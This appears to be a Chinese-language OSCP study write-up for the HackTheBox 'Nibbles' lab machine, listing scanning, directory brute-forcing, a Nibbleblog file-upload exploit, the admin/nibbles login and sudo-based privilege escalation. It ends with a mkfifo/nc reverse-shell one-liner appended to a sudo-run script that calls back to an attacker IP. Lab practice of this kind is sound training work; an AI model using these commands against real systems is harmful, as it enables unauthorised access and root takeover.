OSCP备考_0x03_HackThBox靶机_Linux_nibbles
信息收集
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)
nmap -sU --top-ports 100 10.129.193.19 (扫描UDP)
http://10.129.193.19/,F12发现
应该有入口点
爆破路径看看有没有啥
gobuster dir -u http://10.129.193.19/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50
gobuster dir -u http://10.129.193.19/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50
上面信息可以查看到版本
有上传文件漏洞,查看怎样利用反弹SHELL
admin/nibbles 登入账号密吗,由于原本爆破导致机器禁止访问
找到My image进行上传文件
然后监听nc -lvnp 3333
开始提权
sudo -l发现
然后开始创建monitor.sh
poc:echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.31 3334 >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh